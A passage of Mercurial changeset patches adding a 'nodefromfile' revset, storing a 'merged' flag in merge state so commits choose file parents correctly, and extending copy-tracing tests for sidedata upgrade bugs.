error.WdirUnsupported: rn = wdirrev + return rn + + +@predicate(b'id(string)', safe=True) +def node_(repo, subset, x): + """Revision non-ambiguously specified by the given hex string prefix.""" + # i18n: "id" is a keyword + l = getargs(x, 1, 1, _(b"id requires one argument")) + # i18n: "id" is a keyword + n = getstring(l[0], _(b"id requires a string")) + rn = _node(repo, n) if rn is None: return baseset() diff --git a/tests/test-default-push.t b/tests/test-default-push.t --- a/tests/test-default-push.t +++ b/tests/test-default-push.t @@ -137,6 +137,7 @@ $ hg --config 'paths.default:pushrev=notdefined()' push pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) hg: parse error: unknown identifier: notdefined + (did you mean nodefromfile?) [10] $ hg --config 'paths.default:pushrev=(' push diff --git a/tests/test-revset.t b/tests/test-revset.t --- a/tests/test-revset.t +++ b/tests/test-revset.t @@ -3108,3 +3108,18 @@ $ log 'expectsize(0:2, :2)' abort: revset size mismatch. expected between 0 and 2, got 3 [255] + +Test getting list of node from file + + $ hg log -r '0:2' -T '{node}\n' > some.nodes + $ hg log -r 'nodefromfile("some.nodes")' -T '{rev}\n' + 0 + 1 + 2 + $ hg log -r 'nodefromfile("missing-file")' -T '{rev}\n' + abort: cannot open nodes file "missing-file": $ENOENT$ + [255] + $ echo bad-node > bad.nodes + $ hg log -r 'nodefromfile("bad.nodes")' -T '{rev}\n' + $ echo abcdefabcdefabcdeabcdeabcdeabcdeabcdeabc > missing.nodes + # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1615362272 -19800 # Wed Mar 10 13:14:32 2021 +0530 # Node ID 5a0b930cfb3ee0dba307a80b0ca90b4ff4cfb823 # Parent 56d441256e82837d0ed7d1a834a9181a6af570d3 commit: get info from mergestate whether a file was merged or not While commiting a merge, the commit code does not know whether a file was merged during `hg merge` or not. This leads the commit code to look for filelog ancestor to choose parents of new filelog created on merge commit. This leads to wrong results in some cases as demonstrated by previous patch. From this patch, we start storing information about merged files in mergestate in stateextras and then use that on commit to detect whether we need to set two parents or not. Differential Revision: https://phab.mercurial-scm.org/D10149 diff --git a/mercurial/commit.py b/mercurial/commit.py --- a/mercurial/commit.py +++ b/mercurial/commit.py @@ -361,6 +361,8 @@ elif fparent2 != nullid: if ms.active() and ms.extras(fname).get(b'filenode-source') == b'other': fparent1, fparent2 = fparent2, nullid + elif ms.active() and ms.extras(fname).get(b'merged') != b'yes': + fparent1, fparent2 = fparent1, nullid # is one parent an ancestor of the other? else: fparentancestors = flog.commonancestorsheads(fparent1, fparent2) diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -1698,6 +1698,7 @@ tocomplete = [] for f, args, msg in mergeactions: repo.ui.debug(b" %s: %s -> m (premerge)\n" % (f, msg)) + ms.addcommitinfo(f, {b'merged': b'yes'}) progress.increment(item=f) if f == b'.hgsubstate': # subrepo states need updating subrepoutil.submerge( @@ -1713,6 +1714,7 @@ # merge for f, args, msg in tocomplete: repo.ui.debug(b" %s: %s -> m (merge)\n" % (f, msg)) + ms.addcommitinfo(f, {b'merged': b'yes'}) progress.increment(item=f, total=numupdates) ms.resolve(f, wctx) diff --git a/tests/test-backout.t b/tests/test-backout.t --- a/tests/test-backout.t +++ b/tests/test-backout.t @@ -718,6 +718,7 @@ ancestor path: foo (node f89532f44c247a0e993d63e3a734dd781ab04708) other path: foo (node f50039b486d6fa1a90ae51778388cad161f425ee) extra: ancestorlinknode = 91360952243723bd5b1138d5f26bd8c8564cb553 + extra: merged = yes $ mv .hg/merge/state2 .hg/merge/state2-moved $ hg debugmergestate -v no version 2 merge state diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -946,8 +946,7 @@ $ hg ci -m "mFB-change-m-0 $case_desc - the other way" created new head $ hg manifest --rev . --debug | grep " d" - 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset missing-correct-output !) - 646ed7992dec41eb29635ab28268e7867d0e59a0 644 d (no-changeset known-bad-output !) + 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset !) cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !) #if no-changeset $ hg debugindex d | ../no-linkrev @@ -961,7 +960,6 @@ 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577 7 * d55cb4e9ef57 000000000000 000000000000 8 * 1c334238bd42 7b79e2fe0c89 000000000000 - 9 * 646ed7992dec 7b79e2fe0c89 d8252ab2e760 (known-bad-output !) #else $ hg debugindex d | ../no-linkrev rev linkrev nodeid p1 p2 @@ -1917,10 +1915,12 @@ ##### revision "mFB-change-m-0 merge with extra change - B side" ##### 1 sidedata entries entry-0014 size 14 - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (known-bad-output !) - merged : d, ; (known-bad-output !) - '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (missing-correct-output !) - touched : d, ; (missing-correct-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) + touched : d, ; (no-upgraded no-upgraded-parallel !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) + merged : d, ; (upgraded-parallel known-bad-output !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) + merged : d, ; (upgraded known-bad-output !) ##### revision "j-1" ##### 1 sidedata entries entry-0014 size 24 @@ -3357,13 +3357,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFB-change-m-0")' M b A d - h (filelog missing-correct-output !) - a (filelog known-bad-output !) - h (sidedata !) - h (upgraded !) - h (upgraded-parallel !) - h (changeset !) - h (compatibility !) + h A t p R a @@ -3422,10 +3416,6 @@ | : o : f-1: rename h -> i :/ - o i-2: c -move-> d, s -move-> t (known-bad-output !) - | (known-bad-output !) - o i-1: a -move-> c, p -move-> s (known-bad-output !) - | (known-bad-output !) o i-0 initial commit: a b h p q r #else diff --git a/tests/test-histedit-non-commute-abort.t b/tests/test-histedit-non-commute-abort.t --- a/tests/test-histedit-non-commute-abort.t +++ b/tests/test-histedit-non-commute-abort.t @@ -84,6 +84,7 @@ ancestor path: e (node 0000000000000000000000000000000000000000) other path: e (node 6b67ccefd5ce6de77e7ead4f5292843a0255329f) extra: ancestorlinknode = 0000000000000000000000000000000000000000 + extra: merged = yes $ hg resolve -l U e diff --git a/tests/test-merge-changedelete.t b/tests/test-merge-changedelete.t --- a/tests/test-merge-changedelete.t +++ b/tests/test-merge-changedelete.t @@ -96,17 +96,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -163,17 +166,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -243,17 +249,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -307,17 +316,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -358,17 +370,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "r") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -405,17 +420,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "r") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -453,17 +471,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -512,17 +533,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -573,17 +597,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -631,17 +658,20 @@ other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff extra: merge-removal-candidate = yes + extra: merged = yes file: file3 (state "u") local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "") ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4) other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -801,11 +831,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -840,11 +872,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -877,11 +911,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "r") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes *** file1 does not exist --- file2 --- 2 @@ -916,11 +952,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -963,11 +1001,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed @@ -1011,11 +1051,13 @@ ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be) other path: file1 (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes file: file2 (state "u") local path: file2 (hash 0000000000000000000000000000000000000000, flags "") ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e) other path: file2 (node e7c1328648519852e723de86c0c0525acd779257) extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff + extra: merged = yes --- file1 --- 1 changed diff --git a/tests/test-merge-criss-cross.t b/tests/test-merge-criss-cross.t --- a/tests/test-merge-criss-cross.t +++ b/tests/test-merge-criss-cross.t @@ -540,6 +540,7 @@ other path: the-file (node 59e363a07dc876278f0e41756236f30213b6b460) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes extra: other-file (filenode-source = other) $ hg ci -m "merge-deleting-the-file-from-deleted" $ hg manifest @@ -563,6 +564,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes $ hg ci -m "merge-deleting-the-file-from-updated" created new head $ hg manifest @@ -586,6 +588,7 @@ other path: the-file (node 59e363a07dc876278f0e41756236f30213b6b460) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes extra: other-file (filenode-source = other) $ hg ci -m "merge-keeping-the-file-from-deleted" created new head @@ -614,6 +617,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589 extra: merge-removal-candidate = yes + extra: merged = yes $ hg ci -m "merge-keeping-the-file-from-updated" created new head $ hg manifest @@ -695,6 +699,7 @@ other path: the-file (node 885af55420b35d7bf3bbd6f546615295bfe6544a) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): adfd88e5d7d3d3e22bdd26512991ee64d59c1d8f @@ -763,6 +768,7 @@ other path: the-file (node 885af55420b35d7bf3bbd6f546615295bfe6544a) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): a4e0e44229dc130be2915b92c957c093f8c7ee3e @@ -886,6 +892,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): e9b7081317232edce73f7ad5ae0b7807ff5c326a @@ -923,6 +930,7 @@ other path: the-file (node 0000000000000000000000000000000000000000) extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071 extra: merge-removal-candidate = yes + extra: merged = yes #else $ hg debugmergestate local (working copy): e9b7081317232edce73f7ad5ae0b7807ff5c326a diff --git a/tests/test-obsolete.t b/tests/test-obsolete.t --- a/tests/test-obsolete.t +++ b/tests/test-obsolete.t @@ -1844,6 +1844,7 @@ ancestor path: file (node bc7ebe2d260cff30d2a39a130d84add36216f791) other path: file (node b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3) extra: ancestorlinknode = b73b8c9a4ab4da89a5a35a6f10dfb13edc84ca37 + extra: merged = yes We should be able to see the log (without the deleted commit, of course) $ hg log -G @ 0:f53e9479dce5 (draft) [tip ] first diff --git a/tests/test-rebase-abort.t b/tests/test-rebase-abort.t --- a/tests/test-rebase-abort.t +++ b/tests/test-rebase-abort.t @@ -95,6 +95,7 @@ ancestor path: common (node de0a666fdd9c1a0b0698b90d85064d8bd34f74b6) other path: common (node 2f6411de53677f6f1048fef5bf888d67a342e0a5) extra: ancestorlinknode = 3163e20567cc93074fbb7a53c8b93312e59dbf2c + extra: merged = yes $ hg resolve -l U common diff --git a/tests/test-resolve.t b/tests/test-resolve.t --- a/tests/test-resolve.t +++ b/tests/test-resolve.t @@ -255,11 +255,13 @@ ancestor path: file1 (node 2ed2a3912a0b24502043eae84ee4b279c18b90dd) other path: file1 (node 6f4310b00b9a147241b071a60c28a650827fb03d) extra: ancestorlinknode = 99726c03216e233810a2564cbc0adfe395007eac + extra: merged = yes file: file2 (state "u") local path: file2 (hash cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523, flags "") ancestor path: file2 (node 2ed2a3912a0b24502043eae84ee4b279c18b90dd) other path: file2 (node 6f4310b00b9a147241b071a60c28a650827fb03d) extra: ancestorlinknode = 99726c03216e233810a2564cbc0adfe395007eac + extra: merged = yes $ hg resolve -l R file1 U file2 @@ -271,7 +273,7 @@ { "commits": [{"label": "working copy", "name": "local", "node": "57653b9f834a4493f7240b0681efcb9ae7cab745"}, {"label": "merge rev", "name": "other", "node": "dc77451844e37f03f5c559e3b8529b2b48d381d1"}], "extras": [], - "files": [{"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file1", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}], "local_flags": "", "local_key": "60b27f004e454aca81b0480209cce5081ec52390", "local_path": "file1", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file1", "path": "file1", "state": "r"}, {"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file2", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}], "local_flags": "", "local_key": "cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523", "local_path": "file2", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file2", "path": "file2", "state": "u"}] + "files": [{"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file1", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}, {"key": "merged", "value": "yes"}], "local_flags": "", "local_key": "60b27f004e454aca81b0480209cce5081ec52390", "local_path": "file1", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file1", "path": "file1", "state": "r"}, {"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file2", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}, {"key": "merged", "value": "yes"}], "local_flags": "", "local_key": "cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523", "local_path": "file2", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file2", "path": "file2", "state": "u"}] } ] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615607645 -3600 # Sat Mar 13 04:54:05 2021 +0100 # Node ID e4696ba43ecd3010a1d6efc3b4dc128c9c5b5b3f # Parent 5a0b930cfb3ee0dba307a80b0ca90b4ff4cfb823 test-copies: show some wrong ChangedFiles upgrade For file present only on one side and touched during merge, the upgrade code confused them as "merged". However they should be either "touched", or "salvaged" but they are currently recorded as "merged". See the next changesets for more details on these cases and fix. Differential Revision: https://phab.mercurial-scm.org/D10218 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -999,6 +999,8 @@ does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" about that file should stay unchanged. +We also touch J during some of the merge to check for unrelated change to new file during merge. + $ case_desc="chained merges (conflict -> simple) - same content everywhere" (extra unrelated changes) @@ -1048,17 +1050,19 @@ $ hg merge 'desc("j-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) + $ echo jj > unrelated-j $ hg ci -m "mEA,Jm: $case_desc" (merge variant 4) $ hg up 'desc("j-1")' - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) - 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) $ hg merge 'desc("mEAm")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) + $ echo jj > unrelated-j $ hg ci -m "mJ,EAm: $case_desc" created new head @@ -1941,12 +1945,22 @@ '\x00\x00\x00\x00' ##### revision "mEA,Jm" ##### 1 sidedata entries - entry-0014 size 4 - '\x00\x00\x00\x00' + entry-0014 size 24 + '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (no-upgraded no-upgraded-parallel !) + touched : unrelated-j, ; (no-upgraded no-upgraded-parallel !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded known-bad-output !) + merged : unrelated-j, ; (upgraded known-bad-output !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded-parallel known-bad-output !) + merged : unrelated-j, ; (upgraded-parallel known-bad-output !) ##### revision "mJ,EAm" ##### 1 sidedata entries - entry-0014 size 4 - '\x00\x00\x00\x00' + entry-0014 size 24 + '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (no-upgraded no-upgraded-parallel !) + touched : unrelated-j, ; (no-upgraded no-upgraded-parallel !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded known-bad-output !) + merged : unrelated-j, ; (upgraded known-bad-output !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded-parallel known-bad-output !) + merged : unrelated-j, ; (upgraded-parallel known-bad-output !) ##### revision "s-1" ##### 1 sidedata entries entry-0014 size 24 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1614646829 -3600 # Tue Mar 02 02:00:29 2021 +0100 # Node ID 316a768f2e43e1bb308b9f1265df5100ea43601e # Parent e4696ba43ecd3010a1d6efc3b4dc128c9c5b5b3f test-copies: add a test updating file content while salvaging it A deleted file is brought back during a merge. Its content is changed in the same go. This reveal some issue with the upgrade code. Differential Revision: https://phab.mercurial-scm.org/D10088 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -988,6 +988,63 @@ o i-0 initial commit: a b h p q r +Subcase: restoring and untouched deleted file, while touching it +```````````````````````````````````````````````````````````````` + +Merge: +- one removing a file (d) +- one leaving the file untouched +- the merge actively restore the file to the same content. + +In this case, the file keep on living after the merge. So we should not drop its +copy tracing chain. + + $ case_desc="merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge)" + + $ hg up 'desc("c-1")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 